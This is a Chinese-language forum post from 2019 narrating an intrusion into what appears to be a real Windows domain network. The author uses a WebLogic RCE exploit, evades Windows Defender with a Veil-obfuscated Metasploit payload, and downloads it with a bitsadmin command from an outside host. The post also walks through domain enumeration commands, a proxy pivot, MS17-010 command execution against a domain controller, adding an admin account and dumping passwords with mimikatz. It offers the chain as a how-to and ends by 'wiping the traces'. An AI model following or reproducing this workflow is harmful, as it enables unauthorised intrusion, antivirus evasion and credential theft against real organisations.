Weblogic引发的血案二

isnull   ·   发表于 2019-04-02 11:43:29   ·   漏洞文章


直接用WebLogic_Wls-Wsat_RCE_Exp.jarexp获取到shell,和上一篇文章一样。


信息收集

hostname -->OXXX
systeminfo -->Windows Serverr 2008 Standard x64
ipconfig -->192.168.101.3
whoami & net localgroup administrators -->得知当前用户不是管理员组
tasklist -->微软自带杀软 MsMpEng.exe 202个补丁
所属域 -->ALxxx
无视xxx



攻击


此杀软,用Veil免杀生成msfexp就能过。利用bitsadmin命令将exp上传到目标机。

bitsadmin /transfer n http://xxx.xxx.xxx/xxx.exe C:\xxx\xxx.exe


运行exp,然后在msf上监听得到shell


cs也来客串一下


因为不是系统权限,所以尝试了getsystem命令提权,发现报错,mimikatz也抓不出哈希,于是就收集了域信息


net group 查看组名
net group "domain admins" /domain 查看域管理员

nltest /dclist:ALxxx 查看域控


SRxx -->192.168.101.1 域控
SRxxx -->192.168.101.8 域控
GBxxx -->192.168.121.1 域控


内网游游

内网渗透的本质是收集信息 –某大牛
现在已掌握的信息如下:


拿下了192.168.101.3(不完全控制,因为不是最高权限,也不打算往提权方面走,因为我懒)
明确域管和域控



利用x.3机子作为代理机子,这里用到的是ew.exe,代理访问内网。

ms17-010

似乎代理进内网第一件事情就是扫445端口



运气不错,发现域控192.168.101.8存在445漏洞msf里的ms17-010的利用工具有四个,一个扫描漏洞,一个任意执行命令,两个反弹meterpretershell,这里只能用auxiliary/admin/smb/ms17_010_command这模块的,也就是任意执行命令


想执行命令上传马儿的,但是powershellbitsadmin命令执行完后各种报错上传不成功,也试过cs各种exp也弹不回来shell,于是添加管理员用户远程链接之



上去后发现,原来机子不通外网,难怪之前的马儿回不来。。

mimikatz

将域控里的管理员密码全部dump出来



接下来可以拿着域管的账号登入到域里机子了,先尝试登入其他两个域控,运气不错,该域管也属于这两个域控的


域控都是不通外网的,擦屁股溜了~


打赏我,让我更有动力~

0 条回复   |  直到 2019-4-2 | 1121 次浏览
登录后才可发表内容
返回顶部 投诉反馈

© 2016 - 2024 掌控者 All Rights Reserved.